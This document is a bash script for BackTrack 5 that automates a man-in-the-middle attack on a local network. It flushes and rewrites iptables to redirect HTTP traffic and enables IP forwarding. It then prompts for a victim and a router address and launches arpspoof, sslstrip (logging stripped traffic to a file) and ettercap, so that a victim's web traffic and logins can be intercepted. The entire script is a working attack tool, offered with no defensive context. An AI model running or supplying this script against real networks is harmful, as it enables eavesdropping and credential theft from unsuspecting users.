#!/bin/bash
# Script for sniffing https connections.
# Script uses Arpspoof, SSLStrip and Ettercap.
# Tested on BT5-r1 gnome32
# BY gHero
# Ver 0.1
# ASCII sniff.sh
clear
echo ' =========================================================
| .__ _____ _____ .__ |
| ______ ____ |__|/ ____\/ ____\ _____| |__ |
| / ___// \| \ __\\ __\ / ___/ | \ |
| \___ \| | \ || | | | \___ \| Y \ |
| /____ >___| /__||__| |__| /\/____ >___| / |
| \/ \/ \/ \/ \/ |
| TESTED bt5r1-gnome32+ettercap 0.7.4-lazarus |'
echo " ========================================================="
sleep 2
killall ettercap
killall arpspoof
killall sslstrip
echo " "
echo " killing all process OK!!!!"
echo " "
sleep 2
#clean
iptables --flush &&
iptables --table nat --flush &&
iptables --delete-chain &&
iptables --table nat --delete-chain &&
echo ' ip-tables flushed OK!!!!'
#PORTFORWARDING
echo '1' > /proc/sys/net/ipv4/ip_forward
sleep 1
#CONFIGURE IP-TABLES
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2
# ARPSPOOF
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address:"; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address:"; tput sgr0
read IP2
echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>:"; tput sgr0
read INT
# xterm window variables
x="0" # x offset value
y="0" # y offset value
width="110" # width value
height="15" # height value
yoffset="220" # y offset
xterm -geometry "$width"x$height-$x+$y -bg black -fg white -T "ARPSPOOF" -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
sleep 2
# SSLSTRIP
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -bg red -fg black -T "SSLSTRIP 0.9" -e 'sslstrip -a -w ssl_log.txt' &
sleep 2
# ETTERCAP
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -bg blue -fg white -T "ETTERCAP 0.7.4-Lazarus" -e 'ettercap -T -q -i '$INT'' &
# DRIFTNET
#xterm -geometry "$width"x$height-$x+$y -bg black -fg white -T "DRIFTNET" -e driftnet -p -i $INT &